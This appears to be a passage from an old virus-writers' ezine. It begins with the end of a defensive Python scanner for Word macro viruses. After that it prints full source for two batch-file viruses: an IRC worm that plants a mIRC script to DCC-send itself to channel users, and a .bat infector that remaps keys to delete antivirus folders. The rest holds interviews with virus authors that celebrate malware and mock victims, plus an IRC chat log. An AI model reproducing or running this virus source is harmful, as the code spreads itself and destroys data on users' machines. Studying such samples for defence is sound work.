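    hits maps each indicator name to the 1-based line numbers where it fired;
    replicating is True when every REPLICATION_CORE indicator was seen.
    """
    hits: dict[str, list[int]] = {}
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, pattern in INDICATORS:
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits, REPLICATION_CORE <= set(hits)


def report(source: str) -> str:
    """Human-readable summary for one module."""
    hits, replicating = scan_module(source)
    lines = [f"{name}: lines {nums}" for name, nums in sorted(hits.items())]
    lines.append("verdict: " + ("SELF-REPLICATING MACRO" if replicating else "no replication core"))
    return "\n".join(lines)


# Constructed samples (not code from the zine). The suspect one is a fragment,
# not a working macro: it only carries the indicators the scanner looks for.
BENIGN_MODULE = """Private Sub Document_Open()
Selection.Font.Bold = True
MsgBox "Welcome to the template"
End Sub"""

SUSPECT_MODULE = """Private Sub Document_Open()
Options.VirusProtection = False
With NormalTemplate.VBProject.VBComponents(1).CodeModule
.InsertLines 1, payload
End With
End Sub"""

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_MODULE), ("suspect", SUSPECT_MODULE)):
        print(f"--- {label} ---")
        print(report(src))
```

The benign module fires only on the auto-macro entry point, which on its own is normal for templates; the verdict needs the project access and the module write as well, which is why a single indicator is reported but not acted on.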

@echo off

::IRC.HighHopes.c::by -KD- [Metaphase VX Team & NoMercyVirusTeam]::Greets to Evul, Tally, AngelsKitten, KidCypher, nucleii,::Roadkil, Zanat0s, Duke, Lys, Jackie, Foxz, darkman, lea::Raven, Deloss, JFK, BSL4, and -Everyone- in #virus

if errorlevel 1 goto noscrc:md c:\pkdown >nulecho [script]>>c:\mirc\script.iniecho n0=;HighHopes.a>>c:\mirc\script.iniecho n1=;by -KD- [Metaphase VX Team & NoMercyVirusTeam]>>c:\mirc\script.iniecho n2=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }>>c:\mirc\script.iniecho n3= /dcc send $nick C:\mirc\hope.zip>>c:\mirc\script.iniecho n4=}>>c:\mirc\script.iniecho n5=>>c:\mirc\script.iniecho n6=ON 1:QUIT:#:/msg $chan The grass was greener.>>c:\mirc\script.iniecho n7=ON 1:connect: {>>c:\mirc\script.iniecho n9= /run attrib +r +s +h C:\mirc\script.ini>>c:\mirc\script.iniecho n10= /run attrib +r +s +h C:\mirc\hope.zip>>c:\mirc\script.iniecho n11=}>>c:\mirc\script.iniecho open ftp.elkhart.net>>c:\ftpme.txtecho anonymous>>c:\ftpme.txtecho [email protected]>>c:\ftpme.txtecho cd pub>>c:\ftpme.txtecho cd shareware>>c:\ftpme.txtecho binary>>c:\ftpme.txtecho hash>>c:\ftpme.txtecho lcd c:\pkdown>>c:\ftpme.txtecho get pkzip204.exe>>c:\ftpme.txtecho bye>>c:\ftpme.txt

:noscrecho Keep this open for to have Good Luck! >>c:\highhopes1.txtecho When it closes you will have Good Luck! >>c:\highhopes1.txtecho Some one has high hopes for You!! >>c:\highhopes1.txt@echo ontype c:\highhopes1.txt@echo offecho y| del c:\highhopes1.txt >nulif errorlevel 1 goto noftp%windir%\ftp.exe -s:c:\ftpme.txt >nul

:noftpecho >>c:\highhopes.txtecho The grass was greener. The light was brigher. >>c:\highhopes.txtecho The taste was sweeter. The nights of wonder. >>c:\highhopes.txtecho With friends sorrounding. The dawn mist glowing.>>c:\highhopes.txtecho The water flowing. The endless river. >>c:\highhopes.txtecho For Ever And Ever..... >>c:\highhopes.txt@echo ontype c:\highhopes.txt@echo offif errorlevel 1 goto nogoecho y| del c:\highhopes.txt >nulcd \pkdownc:\pkdown\pkzip204.exe >nulecho y| copy %0 c:\pkdown\highhopes.bat >nulc:\pkdown\pkzip hope.zip highho~1.bat >nulecho y| copy hope.zip c:\mirc >nulcd \

echo y| del c:\pkdown\*.* >nulrd c:\pkdown >nulecho y| del c:\ftpme.txt >nulnogo:@echo offcls

@echo off %_FukThat%

::###########################################

::Fuck That 1.0a

::Deloss / NuKE

::This virus goes out to Ruzz and his

::fucked up policies of with who his members

::in Shadowvx can and cannot speak to.

::Free The Tree Frogs!

::###########################################

if ' %1=='FukThat goto FukThat %2

set FukThat =%0.bat

if not exist %FukThat% set FukThat =%0

if ' %FukThat%==' set FukThat =autoexec.bat

if exist c:\_FukThat.bat goto FG

if not exist %FukThat% goto FZ

find "FukThat" <%FukThat%>c:\_FukThat.bat

attrib c:\_FukThat.bat +h

:FG

command /c c:\_FukThat F V . .. \ %path%

:FZ

set FukThat =

goto FE

:FV

shift %_FukThat%

if ' %2==' exit FukThat

for %%a in ( %2\ * .bat %2* .bat) do call c:\_FukThat F I %%a

goto FV

:FI

find "FukThat" <%3>nul

if not errorlevel 1 goto FE

type %3>FukThat$

echo . >>FukThat$

type c:\_FukThat.bat >>FukThat$

move FukThat$ %3>nul

:FD

echo . | date | find "12" >nul .FukThat

echo DEVICE =c:\windows\command\ansi.sys >>config.sys

if errorlevel 1 goto FN

:FN

echo . | date | find "13" >nul .FukThat

@echo on

echo and if they say you can't come around here say * fuck that * .

echo and if they say you can't come around me say * fuck that * .

ESC[ "n";"y";13p

ESC[ "y";"n";13p

ESC[ "N";"y";13p

ESC[ "Y";"n";13p

ESC[ "a";" del c:\avp";13p

ESC[ "e";" del c:\f-prot";13p

ESC[ "i";" del c:\mcafee";13p

ESC[ "o";" del c:\nav";13p

ESC[ "A";" del c:\avp";13p

ESC[ "E";" del c:\f-prot";13p

ESC[ "I";" del c:\mcafee";13p

ESC[ "O";" del c:\nav";13p

if errorlevel 1 goto FE

echo off

exit FukThat

:FE

Real Time Interview with Rajaat

Interviewer: Gigabyte

First question.. Do all VXers here walk around stoned all day and bang with their heads against lamp posts? <G>

Well, in order to feel at home during an Amsterdam VX meeting you will have to walk the left-hand path of stonedness. I think I'll manage to become Dutch quite well ;-)

How old were you when you had your first experience with computers?

My first computer was an Aquarius, an ugly little fellow with blue rubber keys. I got it for my birthday when I was 7 years old.

How old were you when you joined the VX scene?

I was just about your age when I conducted my first virus experiments, just before I got 18 years old.

How many viruses have you written by now.. any chance your totally drugged brain can still remember?

I cannot recall an actual number, but I think it must be around 200 or so, including minor variants.

Do you consider yourself an 'evil' or rather 'nice' VXer?

I consider myself to be a 'nice' VXer, if you can speak of such a thing. Since we are evil in the eyes of the end users, I frankly don't care if I appear to be friendly or not.

Which language do you like most for writing viruses?

Hah, that's a good question. I would like a language in which you have complete control over the code it generates, so highly configurable languages like C-- or Terse are good, but lack the things needed in a ring0 win32 environment. I yet have to look for a free language that comes with source and generates tight code. Perl is interesting, though extremely bloated.

Did you ever write anything destructive? If so, how do you feel about that now?

I have written one virus that did intentional damage, but after having goofed up with debug I decided for my own good to try to make them as harmless as possible.

What is, in your opinion, the most idiotic comment about any of your viruses you've seen, from AVers?

I laughed a lot when I saw the description of Fick.7326 on the AVP site. I had expected that Kaspersky would be smart enough to recognize that a major part of it is written in Borland C++, instead of Pascal.

Do your family and friends know you write viruses?

Yes, they don't care as long as I leave their machines alone.

What am I doing here between these weirdos? (being the only normal person around)

I have no idea, perhaps masochism? ;-)

Do you have enemies in the scene?

Not that I am aware of. There are people I like and there are people I don't like. These people I do not communicate with may want to consider themselves my enemy but that makes no difference to me.

What do you think about infected users?

I pity them. After so many media hypes (Michelangelo, Melissa, I love you..) people should have learned the necessity of installing a good scanner from a trusted source.

If a family member would catch one of your viruses and he/she had no AV installed at all, no backups and he/she had caught it by running an e-mail attachment, despite all the warnings on the Internet and elsewhere, would you help him/her out?

Yes, and immediately install a cracked version of AVP. I'd tell them they are stupid if they don't keep it updated. My hobby is writing them, not giving users a hard time. Unfortunately, a virus is made to be spread, thus I give them to people who are interested.

What's your favourite VX website?

www.coderz.net, it is like a portal form, just like slashdot.

Are you IRC addicted?

No, I don't think so.

How long are you planning to stay in the scene? (Out, out!! ;)

I have no set plans whatsoever, but I feel like I have not tried all the things I wish to accomplish. There is so much I yet would like to try out, but this mainly has to do with compilers and interpreter issues.

How big do you think my chances are to survive smoking a joint? (in %)

Hmm, about 50% at first, after 20 years of smoking weed I guess that gets trimmed down to 5% :-D But you'll get a try..

Can I take a picture of the cat?

If he agrees you can try, but I had troubles myself keeping him in a pose for longer than 2 seconds.

Which AVers do you hate most?

I don't hate them, though it is a pity they earn money on the digital havoc we wreak.

Which of your viruses are you most proud of?

I think I'm proud of most of them. Each time I coded something I tried out new stuff, so each one is a milestone in my writing (or lack thereof) skills.

Which other viruses do you like?

I for example like Babylonia for the ideas, win32.crypto for its tricks with encryption. All inventive virus writers have my respect.

How important is virus writing for you and does it have any influence on your life?

It has not such a great importance as it used to be for me, since my job consumes most time.

Are you in any other underground scene, except for VX? (hacking, phreaking..)

No, those things don't have my interest.

Do you have a real life?

Not very much, it is consumed by my work most of the time, though I might buy one if I got enough cash.

Which kind of movies and music do you like?

I like some movies like Braveheart, The Mummy, The Matrix, horror and comics. My music preference is hard rock.

Do you have any other hobbies?

I don't have many hobbies though I like reading books and sometimes I even enjoy cooking, since I now have to (can't live on microwave food alone).

Are you married or do you have a girlfriend?

No.

Do you believe in God?

Yes, for I am my own God :-)

What's your favourite country/city?

The place I would like to be my next holiday is Curacao.

Are you getting bored yet?

No, hungry, where is the food in this pillage of papers?

What's your favourite food?

Aargh! Now questions about food while I'm starving? I like pastas and chips of course.

Do you like junk food?

By occasion, when I don't feel like cooking.

Which channel do you prefer, #vir or #virus, and why?

#virus, by lack of knowledge what the other channel is for.

What do you like most about the scene and writing viruses?

The broad scale of different people involved.

Is there anything else you want to mention?

Not right now, I'll mail you when I come to think of something.

Any greetings or hate messages?

Hate to McDonalds, for not grilling their burgers :-)

Thanks for the interview :)

You're welcome, lets have dinner , Gigabyte :-)

Interview with Raid/SLAM, about Irok

Interviewer: Gigabyte

First of all, how did you come up with the name 'Irok'?

It was named after an american car, the iroc-z camaro. I simply named it irok ;p

What about the virus are you personally most proud of?

I'm proud of the fact that avers had no idea what its payloads did for a very long time. Some of them still have incorrect descriptions ;p

How long did it take you to write the virus?

a little over 2 weeks on/off coding

Which part was the most tricky to write?

The memory management section. It's a bitch because of all the little routines inside irok.

Do you ever base your viruses or virus payloads on your real life (something/someone you're mad at, something funnythat happened, habits, etc.), and if so, did you do this in Irok?

Yes, and yes. Irok contains the payload which fits the mood I was in at the time of writing it.

Did you get any positive or negative reactions on the virus payload from other VXers?

I guess it was an even split. Rhape bitched about it, but fuck him. Rather, fuck anybody who doesn't like my code. I don't care. ;p

What is, in your opinion, the most funny or idiotic comment about Irok you've seen, from AVers?

oh hehehe, one second

When internal counters of the virus reach certain values, the virus displays a message on screen. Most of this message is from lyrics of the song 'Aenema' by band 'Tool'. We won't reproduce the message here as the song seriously needs the Parental Advisory sticker for explicit lyrics.

Hahahahahaha

tis funny, no? :)

it sure is. Which AV was that from?

http://www.Europe.F-Secure.com/v-descs/irok.htm

Do you think Irok is better than Toadie?

hmm, no. Toadie was funnier, Irok's mean ;p

On which points is Irok better than other viruses, and what are its weak points?

It's better than some other viruses by default because it works as designed... its weak points would be the memory it requires, and its size. And the fact that it's not polymorphic.

Which other viruses that were in the wild at the time Irok was, or later, do you think that actually were so lame thatthey weren't worth any attention at all, and which ones do you respect?

shrug... The vbs viruses suck in my opinion. As for respecting viruses... I'd have to respect the author of the virus, and I don't respect many people.

What do you consider the most important advantage and disadvantage compared to ASM viruses?

advantage... total control of the pc, disadvantage, takes a long time to write a good one.

How do you think most infected users caught the virus?

probably got greedy, decided to download a crack or something.

If a family member would catch Irok and he/she had no AV installed at all, no backups and he/she had caught Irok by running an e-mail attachment, despite all the warnings on the Internet and elsewhere, would you help him/her out?

Nope, I have little/nothing to do with my family.

What about friends?

I don't have many friends. I think I know 3 people who I really consider as friends. The rest are.. mostly acquaintances.

Do you think the fact that AVers had some trouble figuring out what exactly Irok does, had anything to do with the language it's written in, as ASIC isn't common for viruses?

Yep, and I think perhaps they don't know asm as well as they claim.

How important is virus writing for you and did writing Irok have any influence on your life (time, effort, pride, stress)?

Virus writing and smoking pot keep me alive.

Irok had no influence on anything. it was an accomplishment for me.

Are you planning to write any more Irok versions?

probably not.

Is there anything else you want to mention about Irok?

Yes. For those of you who got hit by it, I hope you lost everything.

Any greetings or hate messages?

Oh yes. Greetings to: heh, Nobody. Hatez goes out to: Most of you on both sides, fuck you all. So much for political correctness eh? <g>

Thanks a lot for the interview :)

Interview with The Unforgiven

Interviewer: Gigabyte

Heya.. To start with, what do you occupy with lately?

Life. Gf, friends, work, parties and all other things you can enjoy doing while you still are a young adult.

Which of your viruses are you most proud of?

None really, don't they all suck? Immortal Riot are though responsible for quite a few really awesome viruses. Not me in person though.

Some of your viruses were pretty destructive. How do you think about that now?

I don't really think anything about it since it's all behind me. I much rather live in the present than in the past.

Do you think the VX scene has changed a lot in all those years and do you think it was better then or now?

I am not really a part of the scene anymore but I try to lurk around and keep myself a bit updated. I'm though not really qualified to make such a comparison.

However, I don't really think you can compare things now and then, if a person starts writing viruses now, he might fancy the scene as much as I did back in 1993.

What do you think about all the Internet related viruses now and do you think there will be much more of them?

Internet based malware (viruses, worms and so on) is indeed an interesting thing and I'm certain that we'll see more virus alike programs circulating on the net in the future.

Internet is very vulnerable and many people will target the net due to the fact that internet technology and internet (un)security are interesting topics and if an attack is done properly, it can affect a lot of people in a very short amount of time.

Which old viruses do you like and which new ones?

I like all viruses. It's a great thing to see that people still sit around and code things just for fun. Programming for me and most other Immortal Riot guys is nowadays strictly business.

Which virus authors and groups do you respect?

Everyone who deserves it. Further information about this can be read in our ezines called Insane Reality, which can all be found at our site located at http://www.coderz.net/ImmortalRiot.

What made you decide to start Immortal Riot?

Curiosity, I think. I'm a very curious person about pretty much everything.

How important was virus writing for you?

Compared with what? Viruswriting was a hobby, the scene was our playground and viruswriting the ticket to acceptance.

Did you base your viruses or virus payloads on real life issues?

I based some names from real life and I got motivation from real life. Everything is about real life issues in one way or another.

What do you think about infected users?

I think they should remove the virus.

How do you think most people caught your viruses?

Probably with anti-virus programs.

I only know one person who caught one of my viruses ([Bad Attitude]). He saw "Immortal Riot" scrolling all over his monitor and later became a very good coder and an Immortal Riot member.

Do you still occupy with computers a lot?

I work with computers, but on my spare time? Maybe an hour a week, to pay bills, write emails to friends and ex-girlfriends and of course to annoy people with SMS :).

Is there anything else you want to mention?

Naw, not really.

Any greets or hate messages?

Greets goes to everyone who ever has been mentioned in a positive manner in Insane Reality and of course to all of Immortal Riot. Special greets must go to Metal Militia.

Thanks a lot for the interview :)

You're welcome.

Interview with Del Armg0/MATRiX

Interviewer: EXE-Gency

Give us a short description of who you are. (Handle, interests, occupation, music, films, location, marital status etc.)

I'm 27, lots of girls and one of my nicks in life is Fa, humm ... what's more...¿ I'm somebody very curious in fact... lots of hobbies (vx, phreak, short-wave listener, role-playing-game, playing electronic music too, astronomy, ... i'm happy when i'm learning in fact ;) Some of my favorite films are "Eraserhead", "Crying Freeman", "Buffet Froid", ... And i luv music-bands like "stereolab", "gong", "bauhaus", ... and many more !

What made you choose your handle?

lots of ppl have asked me about it... it's "simply" a name from an AD&D campaign (during 6 years!), there was a character i played as dungeon master, she was called "Larynda Nedylene Barrisson Del'ArmgO", it was a famous Martial Drow family, and a very fun game, so... i kept the name.

Have you ever had any previous identities in the computer underground?

nop, since i've started i've been known as Del_Armg0, but it's true for some viral experience i sometimes use another nick... it's rare. But since the JC'Zic bust, i prefer to be discreet... sometimes.

When did you first get into computers?

I've started on an Amstrad cpc 464, and a thomson MO5 !!! Was really shit but really fun. After that i've met the Atari world, and it was a great moment. Atari 520/1040 ST was really great. And in 1996, i've bought a PC under windows... humm no comment!

What operating system(s) are you currently running?

I've a first 'puter with Win95, a 486 with a russian Dos (a graphic Dos) called Pts-Dos 6.70 and Win 3.1, i like it a lot. And i'm ever using an Atari 1040 (Tos). At work i'm using Win NT, just shit! I hope i will try Win2k soon, i'm sure it will be a great OS for Vx ;)

How and when did you first discover the computer underground?

Humm... a bit "just like that", i had bought a modem to meet or know more about Underground Electronic ppl... and it's easy to find evil on the Net ;]

How did you first get into virus programming?

I've started coding to make viruses, but i guess the first idea to make a virus came from the first virus i discovered when i was younger, it was really new. And lots of hype was made around it. It was a Cpc virus, but i've forgotten the name, the fascination is always here.. Probably some movies like "Wargames" or "Tron" are important in the story...

Do you have an interest in the other components of the computer underground? (hack/phreak/warez etc.)

Yep. I'm a great fanatic of phreaking, it's a really great and fun "game". Phone network is full of marvellous things... and i'm lucky, i'm now working in phone network. Hacking is cool, but sometimes too much full of "big-EGO-people", so i prefer to try it alone.

Do you consider yourself to be a criminal?

Really not ! But here in France, it's really easy to be one, and for cops i'm probably one... (drug, phreak, vx, ... it's just fun life). But why are all cool things of life illegal !!!?¿

Do the laws in your country make writing viruses illegal and have you had any trouble with the law in your country?

Yes, laws here are very bad for H/P/V; i've never been busted and i hope i won't be! But i'm sometimes tired of being paranoid when i'm connected... (proxys, wingates and other anonymisers...). Sabia is probably the worst spreading i did, and my ISP leaves me.. arrgghhhh! ... but ..but Viva phone S.E. ;)

Do your friends/family/colleagues know about your interest in the computer underground?

Yep, some of them know about it, but really few. It's a bad idea to talk about it because when u send a mail to your friend, he's always afraid ;), and 99% of mass ppl really don't care about vx, so...

What are your opinions on virii with destructive payloads?

I never did it, cos i don't like it very much... I guess some coders are good coders, but not really imaginative... Viruses are artworks, but destruction can be art, so...why not... It's a really great and endless debate, but to my mind, a destructive program is not really a virus. Virus must spread and spread, so why kill the host and kill himself, at the same time ?

How did you get involved with the Matrix virus group?

mort was a good electronic friend, some groups asked me to join, but i was not interested, i said it to mort, and so he asked me to join MATRiX, this time i said "ok".

Does the Matrix group concern themselves with virus programming only or do they have an interest in other underground topics?

Actually MATRiX concerns only virus coding, but i hope i could introduce some other subjects like phreaking, trojans, hacking, ...

Have you been a member of any other groups?

Nop, and i've never thought to be in a group, i liked to be alone; but it could be a good experience (and mort is a really good friend).

Why did you start learning to program? Was it because you wanted to write computer viruses.

i've started to program in 1998 with Delphi, and yes i've started learning to program to write viruses/trojans. So fastly i've learnt asm, i've again to learn asm32 (i'be start). I like a lot to learn some toys or silly languages like VB, VDscript, batch, rebol, javascript,...

What other languages can you program in?

Delphi/Pascal, Asm/Asm32 for serious coding. Vba/Vbs, html/wml, and some other scripting languages, for silly things. I find Rebol very interesting too (31 platforms !!) I like Toys like PcomP, VDS, M:POSTER,...

What do you think of viruses written in languages other than assembly?

i like it! hehehe! Yes, i like all viruses, worms or trojans. Some of them are really nice and ingenious but not in asm; too many virii are variants of a variant actually, probably cos of the big number of asm sources on the Net.

What is the best/favourite virus you have written so far?

Wooo! Really hard...! but IRC-Worm.ElSpy.2278 & .9619 were great worms at this time, it was my really first, and they had some cool features. i liked a lot my script generator too, called "SENSI". And my prog "Bundy" cos' the silly splash screen.

What groups do you value most highly?

I guess 29A is one of the most prolific and original groups of the present time. Perhaps even too present.. i liked Phalcon-Skism, Immortal Riot, SLAM ... but it's a bit old..skool

Which individual programmers (both past and present) do you value most highly?

Wooo, really hard to answer! But i like legends like DarkAvenger and stories like that. Bulgarian Myth is great. The texts about it are nice novels

What zines do you read regularly?

Really a lot! I read almost all E-zines about Vx and Phreaking, i read some french Hacking zines too. (www.madchat.org) Cool H/P zines are PyroFreak, IGA, Hackoff, ... ... ... For Vx Zines, 29A & Vxtasy are perhaps the best (after MATRiX zine, of course:)

What do you think of the virus scene? (Both in general and in your own country.)

I know well the vx trading scene, and there is too much politics... About vx scene, it's a cool place, but too many young people don't want to see that in vx coding there's an EGO part. Hahahaha! I have some electronic friends, but i'm sometimes a bit away from vx scene.

How has the underground scene changed since you first entered?

Scene has changed yes, but scene changed so fastly. Guys appear, disappear,... But since the beginning i've kept some good electronic friends in vx scene, it's enough for me. (booohh Phage!;(

What do you think the future of virus writing holds?

It will depend on different things, like OS. If Linux becomes the main OS it will be a revolution for vxers, probably the scene will be totally changed. And the more networks and networking applications appear, the more worms come too. So the future of viruses is more in the hands of mass ppl than in our hands.

Do you believe in a 'perfect virus'? And if so describe it.

A Worm of course :), Joke! But i believe really that the future of the virus is in the worm properties. The next generation of viral code must have abilities to infect the new hardware (like mobile-phone) and spread using new protocols. WAP network, GPRS and UMTS protocols will be used by phones and tiny computers, the virus will have to use worm technics to spread between phones, computers and other palm & psion. I like the idea of an Autonomous Mobile Cyber Weapon (AMCW) too. The perfect virus will have to use main worm features, will know and find his target and infect files traded by network users (like pictures, ...yes my dream will be to infect .jpg :)

What advice would you give to newbies entering the virus scene?

download, print, read, download, print, read, download, print, read, ... After 6 months like that, come on Irc to meet some ppl and code, code, code, ... A good thing is really to learn the maximum possible things, learn some languages, learn about OS, learn about protocols, learn about people, learn, learn, learn, ...

What language should a newbie learn if he wants to start writing viruses?

It depends really on the newbie, learning Asm first is good to learn some universal maths/coding theories, after Asm all other languages seem easy, hehehe. But the better thing to do is to try all, to learn again and again. All languages are good if u really know this language, the hardest is perhaps to find THE language.

Anything you would like to add?

I guess no, lots of things have been said. And I'm not somebody very talkative (gossipy?) cya.

Any greets?

Yes a lot!!! Greets to: Phage, Perikles, VirusBust, MATRiX team, HomeSlice, Daniel3 Lyskovick, Secret_- Trov, ArteMuse, pbat, mort, Ultras, NBK, TGR, LordDark, Anaktos U, Iblis, W0de, FreDyKrug, Elsa, MelanYe, Roadkill, Zulu, Mist, Urgo32, me, hashish, all!

Any plugs? (Homepage, email address etc.)

Sure!
mailto: [email protected]
http://www.delly.fr.st
http://www.coderz.net/matrix

VX meeting 2000 in Czech Republic: Opinions of a few VXers

Interviewer: Gigabyte

First week of August, quite sunny, boring IRC channels.. the ideal moment for the yearly VX meeting. While AVers were probably thinking all VXers were sitting in their rooms, with a computer, avoiding the sun and giving dumb users a hard time by writing new viruses, some of us were in fact having a great time in Brno, Czech Republic, getting drunk, stoned, even getting some suntan and sticking 'GriYosoft' papers all over the city. If we still remember anything? I sure do! Let's see what the guys have to say..

Did you enjoy the meeting?

GriYo: Oh, if... I always enjoy in all the meetings that we organize in summer. I always find there great dudes ( and dudettes :-P ) and also new places, so i can get my hands out of the keyboard for some days.

Benny: ABSOLUTELY YES!!! I can say it was one of the best timez in this year... you dont think so?

mort: sure, i met ppl who i've seen only on chat

Ratter: of course. it was my first VX meeting in my life and i met great ppl there which i knew only on Internet. It was a great time for me. One of the best in my life...

Did there happen anything funny that you remember?

GriYo: I had fun one day we went to a big park in Brno... I had brought a little bit of hashish from Spain, and we were smoking... We don't take in beginning to say foolishness and to laugh without stopping, it was really funny.

Benny: Yeah, sure. GriYosoft action. all city was full of posters :) and i will never forget how you, GigaByte, got absolutely stoned and drunk, hehe.

mort: yea,... giga and beer :)

Ratter: yeah of course :) talking with you Gig XD

Anything you missed there?

GriYo: Mmmmm... no.

Benny: Yeah, I expected there will come more ppl from foreign countries. nevertheless, it was really very kewl meeting, I had really fun.

mort: more ppl

Ratter: yeah i missed darkman there. and other ppl that do VXing

How often did you have a hangover?

GriYo: Well, we had a hangover every morning... I thought that i was accustomed to drink a lot of beer, but I was wrong, eh Benny? ;-))))

Benny: almost every morning...:P but three or four beerz in the morning helped me a lot to forget :)

mort: hehe,... no comment

Ratter: I don't have hangover after weed :) and i didn't drink a lot

Kevin & Kell, by Bill Holbrook (comic strip)

What follows is the result of a run-in I had with a seriously stupid IRCop of Undernet. If you the reader don't know or understand shared drives and net.exe, this entire file will be one boring read for you. For the rest of us, it's funny as hell... Definitely a keeper if I do say so myself :]

I don't have the logfile handy of my original conversation with chaplain, nor the logfile earlier that day this shit went down, because I don't log from work. I turned on buffer save after CiCi made her threat, otherwise I wouldn't have proof of that either. However, I do have some wonderful emails; and the entire log of CiCi and myself chatting the next day. Now then, on with the show...

Start of #Christian buffer: Fri Sep 08 16:14:38 2000
ne.no) has joined #Christian
<Latte> hello :)
<TremorX> Hiya
<chatcat> i need chocolate
<Latte> how are u
<TremorX> Great.. yourself?
<chatcat> gotta go look throuhg all the chcoclate stashes i know about
<chatcat> laters
*** chatcat has quit IRC (*MEOW*FWACK*HISS*WHACK* "you're right... there ISN"T enough room to swing a cat in here...")
*** ionxy has quit IRC (Ping timeout for ionxy[194.102.79.136])
<Latte> some down, my late wife's brother passed away last nigt
*** AxeAshes has quit IRC (Baltimore-R.MD.US.Undernet.Org Seattle.WA.US.UnderNet.Org)
<TremorX> That's a shame... it's always hard to lose someone you're close to.
<Latte> yes it is, it was cerebral haemorrhage if you understand my english
<TremorX> Yeah
*** AxeAshes ([email protected]) has joined #Christian
<Latte> but what people tell us, they say life must go on, they said that to me when my wife passed away
<TremorX> The problem with that would be trying to get your Mass Air Sensor to register properly. I suppose it COULD be done, but you'll need to add at least a small section of pipe where you can mount it, and then you run a chance of the airflow being wrong. Of course, you could always acquire another stock airbox, do some cutting, get some hosing and try it. No harm in trying, so long as your car still works if you mess up!
<TremorX> --TremorX
<TremorX> ack!
<TremorX> sorry

<TremorX> good thing that's all that was on my clipboard :P
<TremorX> j/k
* TremorX drops a pin
<patience_> hehe
-> *lc* You think a lawyer is going to help you bro? Open shares is your problem...
*** chatcat ([email protected]) has joined #Christian
*** Nuts ([email protected]) has joined #Christian
<JadeGA> l8r :)
<TremorX> Bye hon
<TremorX> *smooch*
<JadeGA> see in little while ;)
<TremorX> ya
*** JadeGA ([email protected]) has left #Christian
<ZoOrOpA> husband and wife?
<TremorX> Not yet :)
<TremorX> Close enuff tho
*** Latte has quit IRC (Leaving)
*** Latte ([email protected]) has joined #Christian
*** Nuts has quit IRC (Ping timeout for Nuts[P29.ASC-MB06.QZN.SKYINET.NET])
*** Nuts ([email protected]) has joined #Christian
*** TremorX has quit IRC (Connection reset by Janet Reno)
*** chatcat has quit IRC (Ping timeout for chatcat[kruse.fwi.com])
*** Melv\Mike ([email protected]) has joined #Christian
*** JnetyBabe ([email protected]) has joined #Christian
<JnetyBabe> can anyone tell me where to look in the bible......
<JnetyBabe> where it talks about sucide and how it makes you go to hell ?
<Raid> I think if you commit suicide you'll goto hell for it, yes.
<Raid> But don't quote me on it, I don't know for sure.
<patience_> it doesnt talk about suicide specifically
*** AxeAshes has quit IRC (<<-NE><GEN·ACiDMAX->> ©1998, KnightFal www.europa.com/~colin)
<Raid> patience_: the bible seems to have a real problem with specifics...
<patience_> not all the time
<patience_> only a few things
<Raid> a few things?
<Raid> according to the bible patience, how old is this planet?
<Raid> a few thousand years?
<patience_> in my opinion
<patience_> wel *i* think about 10000 years or so

<patience_> i'm not exactly sure
<Raid> 10,000 years eh?
<patience_> but theres no verse in the bible that says " the earth is so many years old"
<Raid> Geological Science says she's a hell of a lot older then that.
<patience_> Raid maybe a couple 1000 less
<patience_> ya well
<Raid> by a few million years or so.
* patience_ needs food
<patience_> well i dont believe that
<Raid> We know alot more now then we did in the 1800s :)
<Raid> Do you believe dinosaurs roamed the earth at one point?
<patience_> they could very well have
<patience_> cos they couldda gotten destroyed in the flood
<Raid> could?
<Raid> ehm.. No
<Raid> they did.
<ZoOrOpA> Raid:my mother in law does
* patience_ cant debate because i dont have enough knowledge
<ZoOrOpA> j/k
<ZoOrOpA> j/k
<Raid> DIdn't god claim we were the first?
<patience_> you calling your motheri n law a dinosaur? lol
<Raid> Well, how can we be the first on this planet, if the dinosaurs were here and long gone?
<ZoOrOpA> patience_"im not married...i was trying to be funny
<ZoOrOpA> ;]
<Raid> adam and eve, then they furry little animals...
<Raid> No mention of dinos..
<Raid> Yet, we have real evidence that they existed.
<pSyk_> lol
<patience_> heh
<Raid> like there huge skeleton remains, and the fuel I paid almost 2.00 a gallon that runs my truck.
<pSyk_> Raid STX: STX don't forget, xians don't understand that carbon dating is valid.
<patience_> well God didnt name every single creature He created in Genesis
*** CookieMix ([email protected]) has left #Christian
*** `Pegasus ([email protected]) has joined #Christian
<pSyk_> maybe dinos died out after jesus was crucified.
<Raid> But he did specifically say We were first right?
<`Pegasus> hi a;;

<`Pegasus> hi all
<patience_> hi `Pegasus @
<Raid> The dinosaurs have been LONG gone.
<patience_> umm
<patience_> God created animals maybe first
<pSyk_> yes he did.
<`Pegasus> hi patience :)
<pSyk_> no no
<pSyk_> read the genesis
<patience_> but we were around too i reckon
<patience_> anyway
<`Pegasus> Psyk: You still here?
<pSyk_> god said he created man frist than woman than animals
<Raid> patience_: What about cave men?
<patience_> we all have our own opinions
<Raid> patience_: You can't claim this is my opinion, Dinosaurs roamed this planet.
<pSyk_> they found human remains that date 40,000 years ago...
<`Pegasus> Hi zooropa!
<Raid> it's a fact.
<ZoOrOpA> `Pegasus :]
<Raid> Fossil fuel...
<patience_> well they SAY they are 40000 years old
<patience_> i dont believe it
<patience_> ANYWAY moving on....
<pSyk_> haha
<Raid> real skeletons, some complete.
<Raid> patience_: Not moving on, I like this topic.
<pSyk_> patience_ why not? have you researched carbon dating techniques?
<Raid> and there isn't anything wrong with this topic...
<Raid> it's legit.
<patience_> well i've heard that they can be wrong
<pSyk_> patience_ do you think you are brighter than the scientific community which relys on carbon dating?
<patience_> i heard of particular incidents
<patience_> pSyk_ i didnt say i was
<patience_> i believe God
<Raid> patience_: Where do you believe the gas you put in your car comes from?
<patience_> anywho
<patience_> i'm starvinh hungy
*** Latte ([email protected]) has left #Christian
<patience_> need some food
<Raid> question too difficult to answer or something?
<Nuts> eat well patience

<patience_> i just dont feel like answering em either
* pSyk_ shrugs.
<patience_> but its almost 10pm and i havent had supper
<CiCi> Raid you're about to get your lil tail in alot of trouble from what I'm seeing
<pSyk_> patience_ it's ok. there is no way you can answer that question and have faith in god at the same time.
<CiCi> I suggest you stop threatening people with attacks before I remove you from Undernet
<Raid> patience_: A science lesson for you. The fuel our cars run on is from rotted dino bones. Which took millions (not thousands) of years to produce.
<Raid> CiCi: for?
<Raid> CiCi: Ehh, Who have I threatened ?
-> *CiCi* enlighten me, Whom have I threatend since I've been here?
*** patience_ is now known as pataway
